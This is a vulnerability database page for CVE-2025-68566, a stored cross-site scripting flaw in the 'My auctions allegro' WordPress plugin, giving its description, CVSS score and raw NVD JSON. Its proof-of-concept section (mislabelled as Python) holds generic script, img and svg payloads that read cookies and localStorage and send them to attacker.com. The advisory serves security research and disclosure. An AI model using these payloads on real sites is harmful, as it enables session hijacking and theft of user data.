Security Vulnerability Report
中文
CVE-2025-68566 CVSS 5.9 MEDIUM

CVE-2025-68566

Published: 2025-12-24 13:16:23
Last Modified: 2026-04-27 19:16:31

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Stored XSS.This issue affects My auctions allegro: from n/a through <= 3.6.35.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

my-auctions-allegro-free-edition <= 3.6.35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-68566 --> <!-- This PoC demonstrates the XSS vulnerability in my-auctions-allegro plugin --> <!-- Requires high privilege account (admin) to inject the payload --> <!-- Malicious payload to be injected into auction title/description field --> <script> // Steal user cookies var stolenCookies = document.cookie; // Send cookies to attacker controlled endpoint fetch('https://attacker.com/steal?cookies=' + encodeURIComponent(stolenCookies), { method: 'GET', mode: 'no-cors' }); // Alternative payload: Session hijacking alert('XSS Triggered - Session: ' + document.cookie); </script> <!-- Shortened payload variant --> <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)"> <!-- DOM-based data extraction --> <svg onload="$.get('https://attacker.com/exfil?data='+btoa(JSON.stringify(localStorage)))">

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68566", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:23.470", "lastModified": "2026-04-27T19:16:31.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Stored XSS.This issue affects My auctions allegro: from n/a through <= 3.6.35."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}